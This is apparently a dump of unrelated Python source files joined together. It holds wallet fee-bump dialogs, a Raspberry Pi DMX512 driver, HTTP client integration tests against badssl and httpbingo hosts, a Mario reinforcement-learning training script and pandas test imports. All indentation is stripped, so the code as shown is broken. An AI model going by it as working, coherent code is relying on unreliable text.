plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
dmx512.py
|
#!/usr/bin/python3
# Author: Kenta Ishii
# SPDX short identifier: BSD-3-Clause
# ./dmx512.py
import RPi.GPIO as gpio
import threading
class DMX512:
"""Dependency:RPi.GPIO, threading"""
def __init__(self, list_gpio_output, num_gpio_busy_toggle, num_gpio_eop_toggle):
self.list_gpio_output = list_gpio_output
self.num_gpio_busy_toggle = num_gpio_busy_toggle
self.num_gpio_eop_toggle = num_gpio_eop_toggle
gpio.setmode(gpio.BCM)
gpio.setup(self.list_gpio_output, gpio.OUT)
gpio.output(self.list_gpio_output, 0)
gpio.setup(self.num_gpio_busy_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_busy_toggle, gpio.BOTH)
gpio.setup(self.num_gpio_eop_toggle, gpio.IN, pull_up_down=gpio.PUD_DOWN)
#gpio.add_event_detect(num_gpio_eop_toggle, gpio.BOTH)
def transmitter(self, list_data, index, length, time_delay):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
length += index;
while index < length:
data = list_data[index]
list_bit = []
if data & 0b00001:
list_bit.append(self.list_gpio_output[1])
if data & 0b00010:
list_bit.append(self.list_gpio_output[2])
if data & 0b00100:
list_bit.append(self.list_gpio_output[3])
if data & 0b01000:
list_bit.append(self.list_gpio_output[4])
if data & 0b10000:
list_bit.append(self.list_gpio_output[5])
#print(list_bit)
gpio.output(self.list_gpio_output, 0)
gpio.output(self.list_gpio_output[0], 1) # High State of Clock
gpio.output(list_bit, 1)
dup_time_delay = time_delay
while dup_time_delay > 0:
dup_time_delay -= 1
gpio.output(self.list_gpio_output[0], 0) # Falling Edge of Clock
while True:
if status_gpio_busy_toggle != gpio.input(self.num_gpio_busy_toggle):
status_gpio_busy_toggle = gpio.input(self.num_gpio_busy_toggle)
index += 1
break
def start_tx(self, list_data, index, length, time_delay):
thread = threading.Thread(name='dmx512_start_tx', target=self.transmitter, args=(list_data, index, length, time_delay, ))
thread.setDaemon(True)
thread.start()
return thread
def eop_toggle(self):
return gpio.input(self.num_gpio_eop_toggle)
def __del__(self):
gpio.cleanup()
if __name__ == '__main__':
import sys
import time
import signal
version_info = "DMX512 Alpha"
def handle_sigint(signum, frame):
print(version_info + ": Force Stop")
sys.exit(0)
signal.signal(signal.SIGINT, handle_sigint)
argv = sys.argv
if len(argv) == 1:
time_delay = 4
else:
time_delay = float(argv[1])
print(sys.version)
# Call Class
dmx512 = DMX512([12,16,19,20,21,26], 6, 13)
# Initialization of Flushing Method
list_data = [0x1F, 0x14, 0x1B, 0x11, 0x00, 0x13]
thread1 = dmx512.start_tx(list_data, 0, 6, time_delay)
thread1.join()
# Set Initial Values and Start
list_data = [1] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
# Start DMX512 Transmission
list_data = [0x1D, 0x1A]
thread1 = dmx512.start_tx(list_data, 0, 2, time_delay)
thread1.join()
status_gpio_eop_toggle = dmx512.eop_toggle()
count = 2
while True:
list_data = [count] * 1026
thread1 = dmx512.start_tx(list_data, 0, 1026, time_delay)
thread1.join()
count += 1
if count > 0xF:
count = 0;
break
while True:
if status_gpio_eop_toggle != dmx512.eop_toggle():
status_gpio_eop_toggle = dmx512.eop_toggle()
break
#if gpio.event_detected(num_gpio_eop_toggle) == 1:
# break
|
test_integration.py
|
"""
Integration tests for mureq.
These tests depend on third-party infrastructure and MUST NOT be run in an
automated CI setting.
"""
import contextlib
import json
import unittest
import socket
import threading
import tempfile
import os.path
import urllib.parse
import ssl
import http.client
import http.server
import mureq
class MureqIntegrationTestCase(unittest.TestCase):
def _get_json(self, response):
# helper for httpbin endpoints
self.assertEqual(response.status_code, 200)
self.assertEqual(response.ok, True)
self.assertTrue(response.body is response.content)
result = json.loads(response.body)
self.assertEqual(result['headers']['Host'], ['httpbingo.org'])
return result
def test_get(self):
result = self._get_json(mureq.get('https://httpbingo.org/get'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/get')
def test_get_http(self):
result = self._get_json(mureq.get('http://httpbingo.org/get'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'http://httpbingo.org/get')
def test_headers(self):
result = self._get_json(mureq.get('https://httpbingo.org/get',
headers={'User-Agent': 'xyzzy', 'X-Test-Header': 'plugh'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get')
self.assertEqual(result['headers']['User-Agent'], ['xyzzy'])
self.assertEqual(result['headers']['X-Test-Header'], ['plugh'])
def test_headers_list(self):
headers = [
('X-Test-Header-1', '1'),
('X-Test-Header-2', '2'),
('X-Test-Header-3', '3'),
('X-Test-Header-4', '4'),
]
result = self._get_json(mureq.get('https://httpbingo.org/get', headers=headers))
for k, v in headers:
self.assertEqual(result['headers'][k], [v])
def test_request(self):
result = self._get_json(mureq.request('GET', 'https://httpbingo.org/get', timeout=10.0))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/get')
def test_yield_response(self):
with mureq.yield_response('GET', 'https://httpbingo.org/get') as response:
# should yield the stdlib type
self.assertEqual(type(response), http.client.HTTPResponse)
self.assertEqual(response.status, 200)
self.assertEqual(response.url, 'https://httpbingo.org/get')
self.assertEqual(json.loads(response.read())['url'], 'https://httpbingo.org/get')
def test_bad_method(self):
response = mureq.post('https://httpbingo.org/get')
self.assertEqual(response.status_code, 405)
self.assertEqual(response.ok, False)
response = mureq.request('PATCH', 'https://httpbingo.org/post', body=b'1')
self.assertEqual(response.status_code, 405)
self.assertEqual(response.ok, False)
def test_query_params(self):
result = self._get_json(mureq.get('https://httpbingo.org/get'))
self.assertEqual(result['url'], 'https://httpbingo.org/get')
self.assertEqual(result['args'], {})
result = self._get_json(mureq.get('https://httpbingo.org/get?a=b'))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b')
self.assertEqual(result['args'], {'a': ['b']})
result = self._get_json(mureq.get('https://httpbingo.org/get', params={'a': 'b'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b')
self.assertEqual(result['args'], {'a': ['b']})
result = self._get_json(mureq.get('https://httpbingo.org/get?', params={'a': 'b'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b')
self.assertEqual(result['args'], {'a': ['b']})
result = self._get_json(mureq.get('https://httpbingo.org/get?a=b', params={'c': 'd'}))
self.assertEqual(result['url'], 'https://httpbingo.org/get?a=b&c=d')
self.assertEqual(result['args'], {'a': ['b'], 'c': ['d']})
def test_url_populated(self):
result = mureq.get('https://httpbingo.org/get?a=b')
self.assertEqual(result.url, 'https://httpbingo.org/get?a=b')
result = mureq.get('https://httpbingo.org/get', params={'a': 'b'})
self.assertEqual(result.url, 'https://httpbingo.org/get?a=b')
result = mureq.get('https://httpbingo.org/get?c=d', params={'a': 'b'})
self.assertEqual(result.url, 'https://httpbingo.org/get?c=d&a=b')
def test_head(self):
response = mureq.head('https://httpbingo.org/head')
self.assertIn('Content-Length', response.headers)
def test_post(self):
result = self._get_json(mureq.post('https://httpbingo.org/post', body=b'xyz'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/post')
self.assertEqual(result['data'], 'xyz')
def test_put(self):
result = self._get_json(mureq.put('https://httpbingo.org/put', body=b'strawberry'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/put')
self.assertEqual(result['data'], 'strawberry')
def test_patch(self):
result = self._get_json(mureq.patch('https://httpbingo.org/patch', body=b'burrito'))
self.assertEqual(result['headers']['User-Agent'], [mureq.DEFAULT_UA])
self.assertEqual(result['url'], 'https://httpbingo.org/patch')
self.assertEqual(result['data'], 'burrito')
def test_json(self):
result = self._get_json(mureq.post('https://httpbingo.org/post', json=json.dumps({'a': 1})))
# we must add the application/json header here
self.assertEqual(result['headers']['Content-Type'], ['application/json'])
self.assertEqual(result['json'], {'a': 1})
data = json.dumps({'b': 2})
result = self._get_json(mureq.post('https://httpbingo.org/post', json=data,
headers={'Content-Type': 'application/jose+json'}))
# we must not override the user-supplied content-type header
self.assertEqual(result['headers']['Content-Type'], ['application/jose+json'])
self.assertEqual(result['data'], data)
def test_form(self):
result = self._get_json(mureq.post('https://httpbingo.org/post', form={'a': '1'}))
self.assertEqual(result['headers']['Content-Type'], ['application/x-www-form-urlencoded'])
self.assertEqual(result['data'], 'a=1')
# with the correct Content-Type header, test that the body was interpreted as expected:
self.assertEqual(result['form']['a'], ['1'])
# we must not override the user-supplied content-type header if it is present:
result = self._get_json(mureq.post('https://httpbingo.org/post', form={'a': '1'},
headers={'Content-Type': 'application/jose+json'}))
self.assertEqual(result['headers']['Content-Type'], ['application/jose+json'])
self.assertEqual(result['data'], 'a=1')
def test_redirects(self):
# redirects us to /get
response = mureq.get('https://httpbingo.org/redirect/1')
# by default redirect is not followed
self.assertEqual(response.status_code, 302)
self.assertEqual(response.headers['Location'], '/get')
self.assertEqual(response.url, 'https://httpbingo.org/redirect/1')
# allow 1 redirect, we should actually retrieve /get
response = mureq.get('https://httpbingo.org/redirect/1', max_redirects=1)
# url field should be populated with the retrieved URL
self.assertEqual(response.url, 'https://httpbingo.org/get')
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
# redirect twice, should be disallowed:
with self.assertRaises(mureq.TooManyRedirects):
mureq.get('https://httpbingo.org/redirect/2', max_redirects=1)
response = mureq.get('https://httpbingo.org/redirect/2', max_redirects=2)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
with self.assertRaises(mureq.TooManyRedirects):
mureq.get('https://httpbingo.org/redirect/3', max_redirects=2)
def test_307(self):
response = mureq.get('https://httpbingo.org/redirect-to?url=/get&status_code=307')
self.assertEqual(response.status_code, 307)
self.assertEqual(response.headers['Location'], '/get')
self.assertEqual(response.url, 'https://httpbingo.org/redirect-to?url=/get&status_code=307')
# 307 should be followed
response = mureq.get('https://httpbingo.org/redirect-to?url=/get&status_code=307', max_redirects=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
# 307 doesn't change the method:
response = mureq.get('https://httpbingo.org/redirect-to?url=/post&status_code=307', max_redirects=1)
self.assertEqual(response.status_code, 405)
self.assertEqual(response.url, 'https://httpbingo.org/post')
response = mureq.post('https://httpbingo.org/redirect-to?url=/post&status_code=307', body=b'xyz', max_redirects=1)
self.assertEqual(response.url, 'https://httpbingo.org/post')
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['data'], 'xyz')
def test_303(self):
# 303 turns POST into GET
response = mureq.post('https://httpbingo.org/redirect-to?url=/post&status_code=303', body=b'xyz')
self.assertEqual(response.status_code, 303)
self.assertEqual(response.url, 'https://httpbingo.org/redirect-to?url=/post&status_code=303')
response = mureq.post('https://httpbingo.org/redirect-to?url=/post&status_code=303', body=b'xyz', max_redirects=1)
# now we're trying to GET to /post, which should fail:
self.assertEqual(response.status_code, 405)
self.assertEqual(response.url, 'https://httpbingo.org/post')
response = mureq.post('https://httpbingo.org/redirect-to?url=/get&status_code=303', body=b'xyz', max_redirects=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.body)['url'], 'https://httpbingo.org/get')
self.assertEqual(response.url, 'https://httpbingo.org/get')
def test_read_limit(self):
response = mureq.get('https://httpbingo.org/get', headers={'X-Test-1': 'porcupine'})
self._get_json(response)
length = int(response.headers.get('content-length'))
self.assertEqual(length, len(response.body))
limit = length//2
response = mureq.get('https://httpbingo.org/get', headers={'X-Test-1': 'porcupine'}, read_limit=limit)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.body), limit)
with self.assertRaises(json.JSONDecodeError):
json.loads(response.body)
def _run_unix_server(sock):
"""Accept loop for a toy http+unix server, to be run in a thread."""
while True:
try:
connection, _ = sock.accept()
except:
return
fileobj = connection.makefile('rb')
# read all headers
while fileobj.readline().strip():
pass
connection.send(b'HTTP/1.0 204 No Content\r\nDate: Sun, 12 Dec 2021 08:17:16 GMT\r\n\r\n')
connection.close()
@contextlib.contextmanager
def unix_http_server():
"""Contextmanager providing a http+unix server with its socket in a tmpdir."""
with tempfile.TemporaryDirectory() as dirpath:
path = os.path.join(dirpath, 'sock')
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(path)
sock.listen(1)
threading.Thread(target=_run_unix_server, args=(sock,)).start()
try:
yield path
finally:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
class MureqIntegrationUnixSocketTestCase(unittest.TestCase):
def test_unix_socket(self):
with unix_http_server() as unix_socket:
response = mureq.get('http://localhost', unix_socket=unix_socket)
self.assertEqual(response.status_code, 204)
self.assertEqual(response.headers['Date'], 'Sun, 12 Dec 2021 08:17:16 GMT')
# test unix socket URL convention:
# quote() has default safe='/', we must explicitly disable that so / is quoted as %2F
response = mureq.get('http+unix://%s/bar/baz' % (urllib.parse.quote(unix_socket, safe=''),))
self.assertEqual(response.status_code, 204)
self.assertEqual(response.headers['Date'], 'Sun, 12 Dec 2021 08:17:16 GMT')
@contextlib.contextmanager
def local_http_server():
with http.server.ThreadingHTTPServer(('127.0.0.1', 0), http.server.SimpleHTTPRequestHandler) as httpd:
host, port = httpd.socket.getsockname()[:2]
try:
threading.Thread(target=httpd.serve_forever).start()
yield port
finally:
httpd.shutdown()
class MureqIntegrationPortTestCase(unittest.TestCase):
def test_nonstandard_port(self):
with local_http_server() as port:
# test reading the port out of the URL:
url = 'http://127.0.0.1:%d/' % (port,)
response = mureq.get(url)
self.assertEqual(response.status_code, 200)
def test_source_address(self):
# TODO implement a local HTTP server that can actually validate
# the source address; right now this is just a coverage test
with local_http_server() as port:
# test reading the port out of the URL:
url = 'http://127.0.0.1:%d/' % (port,)
response = mureq.get(url, source_address='127.18.18.18')
self.assertEqual(response.status_code, 200)
BADSSL_ROOT="""
-----BEGIN CERTIFICATE-----
MIIGfjCCBGagAwIBAgIJAJeg/PrX5Sj9MA0GCSqGSIb3DQEBCwUAMIGBMQswCQYD
VQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5j
aXNjbzEPMA0GA1UECgwGQmFkU1NMMTQwMgYDVQQDDCtCYWRTU0wgVW50cnVzdGVk
IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4XDTE2MDcwNzA2MzEzNVoXDTM2
MDcwMjA2MzEzNVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlh
MRYwFAYDVQQHDA1TYW4gRnJhbmNpc2NvMQ8wDQYDVQQKDAZCYWRTU0wxNDAyBgNV
BAMMK0JhZFNTTCBVbnRydXN0ZWQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkw
ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKQtPMhEH073gis/HISWAi
bOEpCtOsatA3JmeVbaWal8O/5ZO5GAn9dFVsGn0CXAHR6eUKYDAFJLa/3AhjBvWa
tnQLoXaYlCvBjodjLEaFi8ckcJHrAYG9qZqioRQ16Yr8wUTkbgZf+er/Z55zi1yn
CnhWth7kekvrwVDGP1rApeLqbhYCSLeZf5W/zsjLlvJni9OrU7U3a9msvz8mcCOX
fJX9e3VbkD/uonIbK2SvmAGMaOj/1k0dASkZtMws0Bk7m1pTQL+qXDM/h3BQZJa5
DwTcATaa/Qnk6YHbj/MaS5nzCSmR0Xmvs/3CulQYiZJ3kypns1KdqlGuwkfiCCgD
yWJy7NE9qdj6xxLdqzne2DCyuPrjFPS0mmYimpykgbPnirEPBF1LW3GJc9yfhVXE
Cc8OY8lWzxazDNNbeSRDpAGbBeGSQXGjAbliFJxwLyGzZ+cG+G8lc+zSvWjQu4Xp
GJ+dOREhQhl+9U8oyPX34gfKo63muSgo539hGylqgQyzj+SX8OgK1FXXb2LS1gxt
VIR5Qc4MmiEG2LKwPwfU8Yi+t5TYjGh8gaFv6NnksoX4hU42gP5KvjYggDpR+NSN
CGQSWHfZASAYDpxjrOo+rk4xnO+sbuuMk7gORsrl+jgRT8F2VqoR9Z3CEdQxcCjR
5FsfTymZCk3GfIbWKkaeLQIDAQABo4H2MIHzMB0GA1UdDgQWBBRvx4NzSbWnY/91
3m1u/u37l6MsADCBtgYDVR0jBIGuMIGrgBRvx4NzSbWnY/913m1u/u37l6MsAKGB
h6SBhDCBgTELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNV
BAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoMBkJhZFNTTDE0MDIGA1UEAwwrQmFk
U1NMIFVudHJ1c3RlZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eYIJAJeg/PrX
5Sj9MAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBCwUAA4IC
AQBQU9U8+jTRT6H9AIFm6y50tXTg/ySxRNmeP1Ey9Zf4jUE6yr3Q8xBv9gTFLiY1
qW2qfkDSmXVdBkl/OU3+xb5QOG5hW7wVolWQyKREV5EvUZXZxoH7LVEMdkCsRJDK
wYEKnEErFls5WPXY3bOglBOQqAIiuLQ0f77a2HXULDdQTn5SueW/vrA4RJEKuWxU
iD9XPnVZ9tPtky2Du7wcL9qhgTddpS/NgAuLO4PXh2TQ0EMCll5reZ5AEr0NSLDF
c/koDv/EZqB7VYhcPzr1bhQgbv1dl9NZU0dWKIMkRE/T7vZ97I3aPZqIapC2ulrf
KrlqjXidwrGFg8xbiGYQHPx3tHPZxoM5WG2voI6G3s1/iD+B4V6lUEvivd3f6tq7
d1V/3q1sL5DNv7TvaKGsq8g5un0TAkqaewJQ5fXLigF/yYu5a24/GUD783MdAPFv
gWz8F81evOyRfpf9CAqIswMF+T6Dwv3aw5L9hSniMrblkg+ai0K22JfoBcGOzMtB
Ke/Ps2Za56dTRoY/a4r62hrcGxufXd0mTdPaJLw3sJeHYjLxVAYWQq4QKJQWDgTS
dAEWyN2WXaBFPx5c8KIW95Eu8ShWE00VVC3oA4emoZ2nrzBXLrUScifY6VaYYkkR
2O2tSqU8Ri3XRdgpNPDWp8ZL49KhYGYo3R/k98gnMHiY5g==
-----END CERTIFICATE-----
"""
class MureqIntegrationBadSSLTestCase(unittest.TestCase):
def test_ssl(self):
self._check_bad_ssl('https://expired.badssl.com/')
self._check_bad_ssl('https://wrong.host.badssl.com/')
self._check_bad_ssl('https://self-signed.badssl.com/')
self._check_bad_ssl('https://untrusted-root.badssl.com/')
# whether this is detectable will depend on the age of the ca-certificates
# package. Python doesn't have OCSP support: https://bugs.python.org/issue17123
#self._check_bad_ssl('https://revoked.badssl.com/')
#self._check_bad_ssl('https://pinning-test.badssl.com/')
def _check_bad_ssl(self, badurl):
# validation should fail with default arguments
with self.assertRaises(mureq.HTTPException):
response = mureq.get(badurl)
# and succeed with verify=False
response = mureq.get(badurl, verify=False)
self.assertEqual(response.status_code, 200)
def test_ssl_context(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(cadata=BADSSL_ROOT)
response = mureq.get("https://untrusted-root.badssl.com", ssl_context=context)
self.assertEqual(response.status_code, 200)
with self.assertRaises(mureq.HTTPException):
mureq.get("https://httpbingo.org", ssl_context=context)
class MureqIntegrationExceptionTestCase(unittest.TestCase):
def _check_raises(self, url):
with self.assertRaises(mureq.HTTPException):
mureq.get(url, timeout=0.25)
def test_exceptions(self):
# all of these should raise a normal HTTPException
self._check_raises('http://127.0.0.1:48373')
self._check_raises('http://192.168.22.122:48373')
self._check_raises('http://10.32.34.58:48373')
self._check_raises('http://[fe80::fc54:ff:fe94:ed50]:48373')
self._check_raises('http://%2Ftmp%2Fnonexistent_mureq_sock/')
# NXDOMAIN:
self._check_raises('http://mureq.test')
# blackhole (currently):
self._check_raises('http://8.8.8.8')
# refuses connections on port 80 (currently):
self._check_raises('http://files.stronghold.network')
with self.assertRaises(mureq.HTTPException):
mureq.get('http://localhost/', unix_socket='/tmp/nonexistent_mureq_sock')
def _resolve_name(hostname, desired_family=socket.AF_INET6):
for (family, type_, proto, canonname, sockaddr) in socket.getaddrinfo(hostname, None):
if family == desired_family:
return sockaddr[0]
raise ValueError("couldn't resolve", family, hostname)
class MureqIntegrationIPAddressURLTestCase(unittest.TestCase):
# TODO : i think this relies on example.com presenting a certificate without
# requiring SNI. if you substitute httpbingo.org you get:
# ssl.SSLError: [SSL: TLSV1_ALERT_ACCESS_DENIED] tlsv1 alert access denied (_ssl.c:1131)
def test_ipv6_url(self):
addr = _resolve_name('example.com', socket.AF_INET6)
# ipv6 address must be in brackets
http_url = 'http://[%s]/' % (addr,)
http_url_port = 'http://[%s]:80/' % (addr,)
https_url = 'https://[%s]/' % (addr,)
https_url_port = 'https://[%s]:443/' % (addr,)
headers = {'Host': 'example.com'}
self.assertEqual(mureq.get(http_url, headers=headers).status_code, 200)
self.assertEqual(mureq.get(http_url_port, headers=headers).status_code, 200)
self.assertEqual(mureq.get(https_url, headers=headers, verify=False).status_code, 200)
self.assertEqual(mureq.get(https_url_port, headers=headers, verify=False).status_code, 200)
def test_ipv4_url(self):
addr = _resolve_name('example.com', socket.AF_INET)
http_url = 'http://%s/' % (addr,)
http_url_port = 'http://%s:80/' % (addr,)
https_url = 'https://%s/' % (addr,)
https_url_port = 'https://%s:443/' % (addr,)
headers = {'Host': 'example.com'}
self.assertEqual(mureq.get(http_url, headers=headers).status_code, 200)
self.assertEqual(mureq.get(http_url_port, headers=headers).status_code, 200)
self.assertEqual(mureq.get(https_url, headers=headers, verify=False).status_code, 200)
self.assertEqual(mureq.get(https_url_port, headers=headers, verify=False).status_code, 200)
if __name__ == '__main__':
unittest.main() # pragma: no cover
|
train_tiles.py
|
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import os # NOQA: E402
os.environ["CUDA_VISIBLE_DEVICES"] = "3" # NOQA: E402
import argparse
import torch
from src.env import create_train_env
from src.model_tiles import ActorCritic
from src.optimizer import GlobalAdam
from src.process_tiles import local_train, local_test
import torch.multiprocessing as _mp
import shutil
def get_args():
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for
Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=1)
parser.add_argument("--save_interval", type=int, default=500, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros_tiles")
parser.add_argument("--saved_path", type=str, default="trained_models_tiles")
parser.add_argument("--load_from_previous_stage", type=bool, default=True,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
def train(opt):
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage, opt.action_type)
global_model = ActorCritic(1, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_from_previous_stage:
if opt.stage == 1:
previous_world = opt.world - 1
previous_stage = 4
else:
previous_world = opt.world
previous_stage = opt.stage - 1
file_ = "{}/a3c_super_mario_bros_{}_{}".format(opt.saved_path, previous_world, previous_stage)
if os.path.isfile(file_):
global_model.load_state_dict(torch.load(file_))
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
local_train(0, opt, global_model, optimizer, True)
local_test(opt.num_processes, opt, global_model)
# processes = []
#
# for index in range(opt.num_processes):
# if index == 0:
# process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
# else:
# process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
# process.start()
# processes.append(process)
#
# process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
# process.start()
# processes.append(process)
# for process in processes:
# process.join()
if __name__ == "__main__":
opt = get_args()
train(opt)
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import (
Any,
Callable,
ContextManager,
List,
Optional,
Tuple,
Type,
Union,
cast,
)
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
